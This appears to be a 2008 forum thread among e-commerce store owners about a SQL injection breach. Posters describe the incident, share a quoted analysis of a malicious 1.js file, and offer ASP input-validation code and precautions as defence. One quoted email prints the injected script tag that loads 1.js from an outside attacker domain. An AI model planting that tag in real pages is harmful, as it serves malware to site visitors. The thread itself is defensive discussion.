Database Breach

Do you have any info on how the hack was achieved?
If you find/suspect it's an issue with PC then please raise a support request to EA at the earliest opportunity - I know they are keen to keep their product & users safe.

Best of luck with the recovery of your site.
I would recommend upgrading soon after to the latest release.

I Googled it - looks like an SQL injection attack :

<snip>Our initial investigations are pointing at an attack through IIS using ASP in an overload. 

whois lookup showing nihaorr1 registered via Chinese registrar xinnet.com

I used the safety of a VM to look under the hood at the operations of the 1.js file.

It writes several iframes to that seem to come up as page not found (Chinese language pack)
A look at the script is bit confusing and garbled (of course) but consistent reference is made to "cuteqq" as a variable and variable prefix. It creates an executable I have yet to determine its intent or impact.
Googling "cuteqq" pulls up all sorts of harmful flagged pages.  Anyone have any insight on that?

</snip>

It used to be that "sql injection" was all the rage.  In recent months an attack method called "cross site scripting" has become ever so popular and is deadly.  The level of hack attempts has become intense and strong protective measures are necessary.

ProductCart has strong security measures but many sites have other software, such as FAQ tools, news tools, and the like built into them.  Any of those secondary applications may be vulnerable to security threats. 

As a general warning to the entire PC community:  If you have added other scripts to your site, you would be well-advised to engage the services of a professional programmer to review your site and examine such applications for security threats.  It's worth a couple hours of someone's time to poke around instead of running the risk that some day you have to confront the fact you have been hacked.

Here is an e-mail I received from a fellow-developer yesterday, which he had just received from a client.  Don't be the next site to get hacked.   Protect yourselves!

“This past weekend it would appear our database was compromised somehow and it pasted this script into every item we have and just totally deleted all the item descriptions. I have contacted the site host and they did a database restore and everything was fine. Now today I see that same script has been paste to our “add to cart” button and not allowing customers to purchase item.

Here is the script: <script sr<script src=http://www.nihaorr1.com/1.js></script>”

BTW, I should note that the above customer does NOT use PC.  They use a different cart...

Edited by Greg Dinger - 18-April-2008 at 12:22pm

Thank you all for the alert.  It does have a function when something like this gets posted into the forum.  I agree that a trouble ticket has to be raised, yet at the same time it is good to have some sort of warning.  This may not effect all of us and it may be only a one incident and perhaps was caused by some other application running in conjunction with PC.  I want to be safe until we really know what has been going on.

I've taken the following actions as a precaution:
1. I did back up the store database.
2. I did purge all credit cards.
I will do both actions daily until we have this possible thread resolved.

Again thanks for the heads up,
Katharina

Kimmy - your question arrived while I was posting the other response. 

What has to happen is that you have to examine the values that are being passed from page to page.  Someone may have different ideas about how to address this, but here is an example of what I implement for pages that pass a numeric id for a category.  Essentially, if the required category is not provided, I set a fail code.  If the passed value is not a number, I set a fail code.  And when the fail code is set, then I gracefully display a "invalid entry" message and kill the page.  The threat ends there.  (If others have alternative approaches, PLEASE let us know.)

<%
catid = getUserInput(Request.QueryString("catid"),0)
badcat = "0"
if trim(catid) = "" then badcat = "1"
if IsNumeric(trim(catid)) = "False" then badcat = "1"
if badcat = "1" then

%>
<div class="bodytext">
<br /><br /><br />Sorry - insufficient data to process request<br /><br /><br />
</div>
<!--#include virtual="/gallery/includes/footer.asp"-->
<!--#include virtual="/includes/footer.asp"-->
</body>
</html>
<%
response.end
end if
%>

Now in your case, you are passing 2-digit alpha state codes.  If that is the only legitimate value, then you can use ASP string commands to trim that value to a 2-digit length.  By doing that, if the hacker placed additional characters into the querystring, they are chopped off and rendered harmless.

I have another mechanism that I use.  It is a script that is installed in the site, replaces the IIS 500-100 error, and sends the site owner or host (me) an e-mail when a page in the site crashes.  It tends to not be effective for the PC section of the site because EI has their own error handling.  But for other pages, I have found this an essential tool in my defensive measures.  I know every time a script chokes and can frequently tell that the reason for the page crashing was a hack attempt.

Again, if anyone has alternatives they consider stronger or more effective, please speak up.  The barrage of hack attempts these days seems endless and I take these threats very seriously.